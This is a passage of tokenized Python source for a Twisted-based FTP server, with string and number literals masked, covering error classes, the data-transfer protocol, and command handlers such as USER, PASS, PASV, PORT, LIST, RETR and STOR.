errorMessage <EOL> class FileNotFoundError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = FILE_NOT_FOUND <EOL> class AnonUserDeniedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = ANON_USER_DENIED <EOL> class PermissionDeniedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = PERMISSION_DENIED <EOL> class IsNotADirectoryError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = IS_NOT_A_DIR <EOL> class FileExistsError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = FILE_EXISTS <EOL> class IsADirectoryError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = IS_A_DIR <EOL> class CmdSyntaxError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = SYNTAX_ERR <EOL> class CmdArgSyntaxError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = SYNTAX_ERR_IN_ARGS <EOL> class CmdNotImplementedError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = CMD_NOT_IMPLMNTD <EOL> class CmdNotImplementedForArgError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = CMD_NOT_IMPLMNTD_FOR_PARAM <EOL> class FTPError ( Exception ) : <EOL> pass <EOL> class PortConnectionError ( Exception ) : <EOL> pass <EOL> class BadCmdSequenceError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = BAD_CMD_SEQ <EOL> class AuthorizationError ( FTPCmdError ) : <EOL> """<STR_LIT>""" <EOL> errorCode = AUTH_FAILURE <EOL> def debugDeferred ( self , * _ ) : <EOL> log . msg ( '<STR_LIT>' % str ( _ ) , debug = True ) <EOL> _months = [ <EOL> None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DTP ( object , protocol . Protocol ) : <EOL> implements ( interfaces . IConsumer ) <EOL> isConnected = False <EOL> _cons = None <EOL> _onConnLost = None <EOL> _buffer = None <EOL> def connectionMade ( self ) : <EOL> self . isConnected = True <EOL> self . factory . deferred . 
callback ( None ) <EOL> self . _buffer = [ ] <EOL> def connectionLost ( self , reason ) : <EOL> self . isConnected = False <EOL> if self . _onConnLost is not None : <EOL> self . _onConnLost . callback ( None ) <EOL> def sendLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . transport . write ( line + '<STR_LIT:\r\n>' ) <EOL> def _formatOneListResponse ( self , name , size , directory , permissions , hardlinks , modified , owner , group ) : <EOL> """<STR_LIT>""" <EOL> def formatDate ( mtime ) : <EOL> now = time . gmtime ( ) <EOL> info = { <EOL> '<STR_LIT>' : _months [ mtime . tm_mon ] , <EOL> '<STR_LIT>' : mtime . tm_mday , <EOL> '<STR_LIT>' : mtime . tm_year , <EOL> '<STR_LIT>' : mtime . tm_hour , <EOL> '<STR_LIT>' : mtime . tm_min <EOL> } <EOL> if now . tm_year != mtime . tm_year : <EOL> return '<STR_LIT>' % info <EOL> else : <EOL> return '<STR_LIT>' % info <EOL> format = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return format % { <EOL> '<STR_LIT>' : directory and '<STR_LIT:d>' or '<STR_LIT:->' , <EOL> '<STR_LIT>' : permissions . shorthand ( ) , <EOL> '<STR_LIT>' : hardlinks , <EOL> '<STR_LIT>' : owner [ : <NUM_LIT:8> ] , <EOL> '<STR_LIT>' : group [ : <NUM_LIT:8> ] , <EOL> '<STR_LIT:size>' : size , <EOL> '<STR_LIT:date>' : formatDate ( time . gmtime ( modified ) ) , <EOL> '<STR_LIT:name>' : name } <EOL> def sendListResponse ( self , name , response ) : <EOL> self . sendLine ( self . _formatOneListResponse ( name , * response ) ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> return self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> self . transport . unregisterProducer ( ) <EOL> self . transport . loseConnection ( ) <EOL> def write ( self , data ) : <EOL> if self . isConnected : <EOL> return self . transport . write ( data ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def _conswrite ( self , bytes ) : <EOL> try : <EOL> self . _cons . 
write ( bytes ) <EOL> except : <EOL> self . _onConnLost . errback ( ) <EOL> def dataReceived ( self , bytes ) : <EOL> if self . _cons is not None : <EOL> self . _conswrite ( bytes ) <EOL> else : <EOL> self . _buffer . append ( bytes ) <EOL> def _unregConsumer ( self , ignored ) : <EOL> self . _cons . unregisterProducer ( ) <EOL> self . _cons = None <EOL> del self . _onConnLost <EOL> return ignored <EOL> def registerConsumer ( self , cons ) : <EOL> assert self . _cons is None <EOL> self . _cons = cons <EOL> self . _cons . registerProducer ( self , True ) <EOL> for chunk in self . _buffer : <EOL> self . _conswrite ( chunk ) <EOL> self . _buffer = None <EOL> if self . isConnected : <EOL> self . _onConnLost = d = defer . Deferred ( ) <EOL> d . addBoth ( self . _unregConsumer ) <EOL> return d <EOL> else : <EOL> self . _cons . unregisterProducer ( ) <EOL> self . _cons = None <EOL> return defer . succeed ( None ) <EOL> def resumeProducing ( self ) : <EOL> self . transport . resumeProducing ( ) <EOL> def pauseProducing ( self ) : <EOL> self . transport . pauseProducing ( ) <EOL> def stopProducing ( self ) : <EOL> self . transport . stopProducing ( ) <EOL> class DTPFactory ( protocol . ClientFactory ) : <EOL> """<STR_LIT>""" <EOL> _IN_PROGRESS = object ( ) <EOL> _FAILED = object ( ) <EOL> _FINISHED = object ( ) <EOL> _state = _IN_PROGRESS <EOL> peerCheck = False <EOL> def __init__ ( self , pi , peerHost = None , reactor = None ) : <EOL> """<STR_LIT>""" <EOL> self . pi = pi <EOL> self . peerHost = peerHost <EOL> self . deferred = defer . Deferred ( ) <EOL> self . delayedCall = None <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> def buildProtocol ( self , addr ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return None <EOL> self . _state = self . _FINISHED <EOL> self . cancelTimeout ( ) <EOL> p = DTP ( ) <EOL> p . factory = self <EOL> p . pi = self . 
pi <EOL> self . pi . dtpInstance = p <EOL> return p <EOL> def stopFactory ( self ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> self . cancelTimeout ( ) <EOL> def timeoutFactory ( self ) : <EOL> log . msg ( '<STR_LIT>' ) <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return <EOL> self . _state = self . _FAILED <EOL> d = self . deferred <EOL> self . deferred = None <EOL> d . errback ( <EOL> PortConnectionError ( defer . TimeoutError ( "<STR_LIT>" ) ) ) <EOL> def cancelTimeout ( self ) : <EOL> if self . delayedCall is not None and self . delayedCall . active ( ) : <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> self . delayedCall . cancel ( ) <EOL> def setTimeout ( self , seconds ) : <EOL> log . msg ( '<STR_LIT>' % seconds ) <EOL> self . delayedCall = self . _reactor . callLater ( seconds , self . timeoutFactory ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> if self . _state is not self . _IN_PROGRESS : <EOL> return <EOL> self . _state = self . _FAILED <EOL> d = self . deferred <EOL> self . deferred = None <EOL> d . errback ( PortConnectionError ( reason ) ) <EOL> class ASCIIConsumerWrapper ( object ) : <EOL> def __init__ ( self , cons ) : <EOL> self . cons = cons <EOL> self . registerProducer = cons . registerProducer <EOL> self . unregisterProducer = cons . unregisterProducer <EOL> assert os . linesep == "<STR_LIT:\r\n>" or len ( os . linesep ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> if os . linesep == "<STR_LIT:\r\n>" : <EOL> self . write = cons . write <EOL> def write ( self , bytes ) : <EOL> return self . cons . write ( bytes . replace ( os . linesep , "<STR_LIT:\r\n>" ) ) <EOL> class FileConsumer ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( interfaces . IConsumer ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> def registerProducer ( self , producer , streaming ) : <EOL> self . producer = producer <EOL> assert streaming <EOL> def unregisterProducer ( self ) : <EOL> self . 
producer = None <EOL> self . fObj . close ( ) <EOL> def write ( self , bytes ) : <EOL> self . fObj . write ( bytes ) <EOL> class FTPOverflowProtocol ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> def connectionMade ( self ) : <EOL> self . sendLine ( RESPONSE [ TOO_MANY_CONNECTIONS ] ) <EOL> self . transport . loseConnection ( ) <EOL> class FTP ( object , basic . LineReceiver , policies . TimeoutMixin ) : <EOL> """<STR_LIT>""" <EOL> disconnected = False <EOL> UNAUTH , INAUTH , AUTHED , RENAMING = range ( <NUM_LIT:4> ) <EOL> dtpTimeout = <NUM_LIT:10> <EOL> portal = None <EOL> shell = None <EOL> dtpFactory = None <EOL> dtpPort = None <EOL> dtpInstance = None <EOL> binary = True <EOL> PUBLIC_COMMANDS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FEATURES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> passivePortRange = xrange ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> listenFactory = reactor . listenTCP <EOL> def reply ( self , key , * args ) : <EOL> msg = RESPONSE [ key ] % args <EOL> self . sendLine ( msg ) <EOL> def connectionMade ( self ) : <EOL> self . state = self . UNAUTH <EOL> self . setTimeout ( self . timeOut ) <EOL> self . reply ( WELCOME_MSG , self . factory . welcomeMessage ) <EOL> def connectionLost ( self , reason ) : <EOL> if self . dtpFactory : <EOL> self . cleanupDTP ( ) <EOL> self . setTimeout ( None ) <EOL> if hasattr ( self . shell , '<STR_LIT>' ) and self . shell . logout is not None : <EOL> self . shell . logout ( ) <EOL> self . shell = None <EOL> self . transport = None <EOL> def timeoutConnection ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def lineReceived ( self , line ) : <EOL> self . resetTimeout ( ) <EOL> self . pauseProducing ( ) <EOL> def processFailed ( err ) : <EOL> if err . check ( FTPCmdError ) : <EOL> self . sendLine ( err . value . response ( ) ) <EOL> elif ( err . check ( TypeError ) and <EOL> err . value . args [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) : <EOL> self . 
reply ( SYNTAX_ERR , "<STR_LIT>" % ( cmd , ) ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> self . reply ( REQ_ACTN_NOT_TAKEN , "<STR_LIT>" ) <EOL> def processSucceeded ( result ) : <EOL> if isinstance ( result , tuple ) : <EOL> self . reply ( * result ) <EOL> elif result is not None : <EOL> self . reply ( result ) <EOL> def allDone ( ignored ) : <EOL> if not self . disconnected : <EOL> self . resumeProducing ( ) <EOL> spaceIndex = line . find ( '<STR_LIT:U+0020>' ) <EOL> if spaceIndex != - <NUM_LIT:1> : <EOL> cmd = line [ : spaceIndex ] <EOL> args = ( line [ spaceIndex + <NUM_LIT:1> : ] , ) <EOL> else : <EOL> cmd = line <EOL> args = ( ) <EOL> d = defer . maybeDeferred ( self . processCommand , cmd , * args ) <EOL> d . addCallbacks ( processSucceeded , processFailed ) <EOL> d . addErrback ( log . err ) <EOL> from twisted . internet import reactor <EOL> reactor . callLater ( <NUM_LIT:0> , d . addBoth , allDone ) <EOL> def processCommand ( self , cmd , * params ) : <EOL> def call_ftp_command ( command ) : <EOL> method = getattr ( self , "<STR_LIT>" + command , None ) <EOL> if method is not None : <EOL> return method ( * params ) <EOL> return defer . fail ( CmdNotImplementedError ( command ) ) <EOL> cmd = cmd . upper ( ) <EOL> if cmd in self . PUBLIC_COMMANDS : <EOL> return call_ftp_command ( cmd ) <EOL> elif self . state == self . UNAUTH : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . ftp_USER ( * params ) <EOL> elif cmd == '<STR_LIT>' : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> else : <EOL> return NOT_LOGGED_IN <EOL> elif self . state == self . INAUTH : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . ftp_PASS ( * params ) <EOL> else : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> elif self . state == self . AUTHED : <EOL> return call_ftp_command ( cmd ) <EOL> elif self . state == self . RENAMING : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . 
ftp_RNTO ( * params ) <EOL> else : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> def getDTPPort ( self , factory ) : <EOL> """<STR_LIT>""" <EOL> for portn in self . passivePortRange : <EOL> try : <EOL> dtpPort = self . listenFactory ( portn , factory ) <EOL> except error . CannotListenError : <EOL> continue <EOL> else : <EOL> return dtpPort <EOL> raise error . CannotListenError ( '<STR_LIT>' , portn , <EOL> "<STR_LIT>" % <EOL> ( self . passivePortRange , ) ) <EOL> def ftp_USER ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if not username : <EOL> return defer . fail ( CmdSyntaxError ( '<STR_LIT>' ) ) <EOL> self . _user = username <EOL> self . state = self . INAUTH <EOL> if self . factory . allowAnonymous and self . _user == self . factory . userAnonymous : <EOL> return GUEST_NAME_OK_NEED_EMAIL <EOL> else : <EOL> return ( USR_NAME_OK_NEED_PASS , username ) <EOL> def ftp_PASS ( self , password ) : <EOL> """<STR_LIT>""" <EOL> if self . factory . allowAnonymous and self . _user == self . factory . userAnonymous : <EOL> creds = credentials . Anonymous ( ) <EOL> reply = GUEST_LOGGED_IN_PROCEED <EOL> else : <EOL> creds = credentials . UsernamePassword ( self . _user , password ) <EOL> reply = USR_LOGGED_IN_PROCEED <EOL> del self . _user <EOL> def _cbLogin ( ( interface , avatar , logout ) ) : <EOL> assert interface is IFTPShell , "<STR_LIT>" <EOL> self . shell = avatar <EOL> self . logout = logout <EOL> self . workingDirectory = [ ] <EOL> self . state = self . AUTHED <EOL> return reply <EOL> def _ebLogin ( failure ) : <EOL> failure . trap ( cred_error . UnauthorizedLogin , cred_error . UnhandledCredentials ) <EOL> self . state = self . UNAUTH <EOL> raise AuthorizationError <EOL> d = self . portal . login ( creds , None , IFTPShell ) <EOL> d . addCallbacks ( _cbLogin , _ebLogin ) <EOL> return d <EOL> def ftp_PASV ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpFactory is not None : <EOL> self . cleanupDTP ( ) <EOL> self . 
dtpFactory = DTPFactory ( pi = self ) <EOL> self . dtpFactory . setTimeout ( self . dtpTimeout ) <EOL> self . dtpPort = self . getDTPPort ( self . dtpFactory ) <EOL> host = self . transport . getHost ( ) . host <EOL> port = self . dtpPort . getHost ( ) . port <EOL> self . reply ( ENTERING_PASV_MODE , encodeHostPort ( host , port ) ) <EOL> return self . dtpFactory . deferred . addCallback ( lambda ign : None ) <EOL> def ftp_PORT ( self , address ) : <EOL> addr = map ( int , address . split ( '<STR_LIT:U+002C>' ) ) <EOL> ip = '<STR_LIT>' % tuple ( addr [ : <NUM_LIT:4> ] ) <EOL> port = addr [ <NUM_LIT:4> ] << <NUM_LIT:8> | addr [ <NUM_LIT:5> ] <EOL> if self . dtpFactory is not None : <EOL> self . cleanupDTP ( ) <EOL> self . dtpFactory = DTPFactory ( pi = self , peerHost = self . transport . getPeer ( ) . host ) <EOL> self . dtpFactory . setTimeout ( self . dtpTimeout ) <EOL> self . dtpPort = reactor . connectTCP ( ip , port , self . dtpFactory ) <EOL> def connected ( ignored ) : <EOL> return ENTERING_PORT_MODE <EOL> def connFailed ( err ) : <EOL> err . trap ( PortConnectionError ) <EOL> return CANT_OPEN_DATA_CNX <EOL> return self . dtpFactory . deferred . addCallbacks ( connected , connFailed ) <EOL> def _encodeName ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , unicode ) : <EOL> return name . encode ( '<STR_LIT:utf-8>' ) <EOL> return name <EOL> def ftp_LIST ( self , path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None or not self . dtpInstance . isConnected : <EOL> return defer . fail ( BadCmdSequenceError ( '<STR_LIT>' ) ) <EOL> if path . lower ( ) in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> path = '<STR_LIT>' <EOL> def gotListing ( results ) : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> for ( name , attrs ) in results : <EOL> name = self . _encodeName ( name ) <EOL> self . dtpInstance . sendListResponse ( name , attrs ) <EOL> self . dtpInstance . transport . 
loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> d = self . shell . list ( <EOL> segments , <EOL> ( '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> d . addCallback ( gotListing ) <EOL> return d <EOL> def ftp_NLST ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None or not self . dtpInstance . isConnected : <EOL> return defer . fail ( <EOL> BadCmdSequenceError ( '<STR_LIT>' ) ) <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbList ( results , glob ) : <EOL> """<STR_LIT>""" <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> for ( name , ignored ) in results : <EOL> if not glob or ( glob and fnmatch . fnmatch ( name , glob ) ) : <EOL> name = self . _encodeName ( name ) <EOL> self . dtpInstance . sendLine ( name ) <EOL> self . dtpInstance . transport . loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def listErr ( results ) : <EOL> """<STR_LIT>""" <EOL> self . dtpInstance . transport . loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> if _isGlobbingExpression ( segments ) : <EOL> glob = segments . pop ( ) <EOL> else : <EOL> glob = None <EOL> d = self . shell . list ( segments ) <EOL> d . addCallback ( cbList , glob ) <EOL> d . addErrback ( listErr ) <EOL> return d <EOL> def ftp_CWD ( self , path ) : <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def accessGranted ( result ) : <EOL> self . workingDirectory = segments <EOL> return ( REQ_FILE_ACTN_COMPLETED_OK , ) <EOL> return self . shell . access ( segments ) . 
addCallback ( accessGranted ) <EOL> def ftp_CDUP ( self ) : <EOL> return self . ftp_CWD ( '<STR_LIT:..>' ) <EOL> def ftp_PWD ( self ) : <EOL> return ( PWD_REPLY , '<STR_LIT:/>' + '<STR_LIT:/>' . join ( self . workingDirectory ) ) <EOL> def ftp_RETR ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None : <EOL> raise BadCmdSequenceError ( '<STR_LIT>' ) <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> self . setTimeout ( None ) <EOL> def enableTimeout ( result ) : <EOL> self . setTimeout ( self . factory . timeOut ) <EOL> return result <EOL> if not self . binary : <EOL> cons = ASCIIConsumerWrapper ( self . dtpInstance ) <EOL> else : <EOL> cons = self . dtpInstance <EOL> def cbSent ( result ) : <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def ebSent ( err ) : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> if err . check ( FTPCmdError ) : <EOL> return err <EOL> return ( CNX_CLOSED_TXFR_ABORTED , ) <EOL> def cbOpened ( file ) : <EOL> if self . dtpInstance . isConnected : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> else : <EOL> self . reply ( FILE_STATUS_OK_OPEN_DATA_CNX ) <EOL> d = file . send ( cons ) <EOL> d . addCallbacks ( cbSent , ebSent ) <EOL> return d <EOL> def ebOpened ( err ) : <EOL> if not err . check ( PermissionDeniedError , FileNotFoundError , IsADirectoryError ) : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> if err . check ( FTPCmdError ) : <EOL> return ( err . value . errorCode , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> return ( FILE_NOT_FOUND , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> d = self . shell . openForReading ( newsegs ) <EOL> d . addCallbacks ( cbOpened , ebOpened ) <EOL> d . addBoth ( enableTimeout ) <EOL> return d <EOL> def ftp_STOR ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . 
dtpInstance is None : <EOL> raise BadCmdSequenceError ( '<STR_LIT>' ) <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> self . setTimeout ( None ) <EOL> def enableTimeout ( result ) : <EOL> self . setTimeout ( self . factory . timeOut ) <EOL> return result <EOL> def cbOpened ( file ) : <EOL> """<STR_LIT>""" <EOL> d = file . receive ( ) <EOL> d . addCallback ( cbConsumer ) <EOL> d . addCallback ( lambda ignored : file . close ( ) ) <EOL> d . addCallbacks ( cbSent , ebSent ) <EOL> return d <EOL> def ebOpened ( err ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( err . value , FTPCmdError ) : <EOL> return ( err . value . errorCode , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> log . err ( err , "<STR_LIT>" ) <EOL> return ( FILE_NOT_FOUND , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> def cbConsumer ( cons ) : <EOL> """<STR_LIT>""" <EOL> if not self . binary : <EOL> cons = ASCIIConsumerWrapper ( cons ) <EOL> d = self . dtpInstance . registerConsumer ( cons ) <EOL> if self . dtpInstance . isConnected : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> else : <EOL> self . reply ( FILE_STATUS_OK_OPEN_DATA_CNX ) <EOL> return d <EOL> def cbSent ( result ) : <EOL> """<STR_LIT>""" <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def ebSent ( err ) : <EOL> """<STR_LIT>""" <EOL> log . err ( err , "<STR_LIT>" ) <EOL> if err . check ( FTPCmdError ) : <EOL> return err <EOL> return ( CNX_CLOSED_TXFR_ABORTED , ) <EOL> d = self . shell . openForWriting ( newsegs ) <EOL> d . addCallbacks ( cbOpened , ebOpened ) <EOL> d . addBoth ( enableTimeout ) <EOL> return d <EOL> def ftp_SIZE ( self , path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbStat ( ( size , ) ) : <EOL> return ( FILE_STATUS , str ( size ) ) <EOL> return self . shell . 
stat ( newsegs , ( '<STR_LIT:size>' , ) ) . addCallback ( cbStat ) <EOL> def ftp_MDTM ( self , path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbStat ( ( modified , ) ) : <EOL> return ( FILE_STATUS , time . strftime ( '<STR_LIT>' , time . gmtime ( modified ) ) ) <EOL> return self . shell . stat ( newsegs , ( '<STR_LIT>' , ) ) . addCallback ( cbStat ) <EOL> def ftp_TYPE ( self , type ) : <EOL> """<STR_LIT>""" <EOL> p = type . upper ( ) <EOL> if p : <EOL> f = getattr ( self , '<STR_LIT>' + p [ <NUM_LIT:0> ] , None ) <EOL> if f is not None : <EOL> return f ( p [ <NUM_LIT:1> : ] ) <EOL> return self . type_UNKNOWN ( p ) <EOL> return ( SYNTAX_ERR , ) <EOL> def type_A ( self , code ) : <EOL> if code == '<STR_LIT>' or code == '<STR_LIT:N>' : <EOL> self . binary = False <EOL> return ( TYPE_SET_OK , '<STR_LIT:A>' + code ) <EOL> else : <EOL> return defer . fail ( CmdArgSyntaxError ( code ) ) <EOL> def type_I ( self , code ) : <EOL> if code == '<STR_LIT>' : <EOL> self . binary = True <EOL> return ( TYPE_SET_OK , '<STR_LIT:I>' ) <EOL> else : <EOL> return defer . fail ( CmdArgSyntaxError ( code ) ) <EOL> def type_UNKNOWN ( self , code ) : <EOL> return defer . fail ( CmdNotImplementedForArgError ( code ) ) <EOL> def ftp_SYST ( self ) : <EOL> return NAME_SYS_TYPE <EOL> def ftp_STRU ( self , structure ) : <EOL> p = structure . upper ( ) <EOL> if p == '<STR_LIT:F>' : <EOL> return ( CMD_OK , ) <EOL> return defer . fail ( CmdNotImplementedForArgError ( structure ) ) <EOL> def ftp_MODE ( self , mode ) : <EOL> p = mode . upper ( ) <EOL> if p == '<STR_LIT:S>' : <EOL> return ( CMD_OK , ) <EOL> return defer . fail ( CmdNotImplementedForArgError ( mode ) ) <EOL> def ftp_MKD ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . 
fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . makeDirectory ( newsegs ) . addCallback ( lambda ign : ( MKD_REPLY , path ) ) <EOL> def ftp_RMD ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . removeDirectory ( newsegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_DELE ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . removeFile ( newsegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_NOOP ( self ) : <EOL> return ( CMD_OK , ) <EOL> def ftp_RNFR ( self , fromName ) : <EOL> self . _fromName = fromName <EOL> self . state = self . RENAMING <EOL> return ( REQ_FILE_ACTN_PENDING_FURTHER_INFO , ) <EOL> def ftp_RNTO ( self , toName ) : <EOL> fromName = self . _fromName <EOL> del self . _fromName <EOL> self . state = self . AUTHED <EOL> try : <EOL> fromsegs = toSegments ( self . workingDirectory , fromName ) <EOL> tosegs = toSegments ( self . workingDirectory , toName ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( fromName ) ) <EOL> return self . shell . rename ( fromsegs , tosegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_FEAT ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( RESPONSE [ FEAT_OK ] [ <NUM_LIT:0> ] ) <EOL> for feature in self . FEATURES : <EOL> self . sendLine ( '<STR_LIT:U+0020>' + feature ) <EOL> self . sendLine ( RESPONSE [ FEAT_OK ] [ <NUM_LIT:1> ] ) <EOL> def ftp_OPTS ( self , option ) : <EOL> """<STR_LIT>""" <EOL> return self . reply ( OPTS_NOT_IMPLEMENTED , option ) <EOL> def ftp_QUIT ( self ) : <EOL> self . reply ( GOODBYE_MSG ) <EOL> self . transport . loseConnection ( ) <EOL> self . 
disconnected = True <EOL> def cleanupDTP ( self ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> log . msg ( self . dtpPort ) <EOL> dtpPort , self . dtpPort = self . dtpPort , None <EOL> if interfaces . IListeningPort . providedBy ( dtpPort ) : <EOL> dtpPort . stopListening ( ) <EOL> elif interfaces . IConnector . providedBy ( dtpPort ) : <EOL> dtpPort . disconnect ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" % ( dtpPort , ) <EOL> self . dtpFactory . stopFactory ( ) <EOL> self . dtpFactory = None <EOL> if self . dtpInstance is not None : <EOL> self . dtpInstance = None <EOL> class FTPFactory ( policies . LimitTotalConnectionsFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = FTP <EOL> overflowProtocol = FTPOverflowProtocol <EOL> allowAnonymous = True <EOL> userAnonymous = '<STR_LIT>' <EOL> timeOut = <NUM_LIT> <EOL> welcomeMessage = "<STR_LIT>" % ( copyright . version , ) <EOL> passivePortRange = xrange ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> def __init__ ( self , portal = None , userAnonymous = '<STR_LIT>' ) : <EOL> self . portal = portal <EOL> self . userAnonymous = userAnonymous <EOL> self . instances = [ ] <EOL> def buildProtocol ( self , addr ) : <EOL> p = policies . LimitTotalConnectionsFactory . buildProtocol ( self , addr ) <EOL> if p is not None : <EOL> p . wrappedProtocol . portal = self . portal <EOL> p . wrappedProtocol . timeOut = self . timeOut <EOL> p . wrappedProtocol . passivePortRange = self . passivePortRange <EOL> return p <EOL> def stopFactory ( self ) : <EOL> [ p . setTimeout ( None ) for p in self . instances if p . timeOut is not None ] <EOL> policies . LimitTotalConnectionsFactory . 
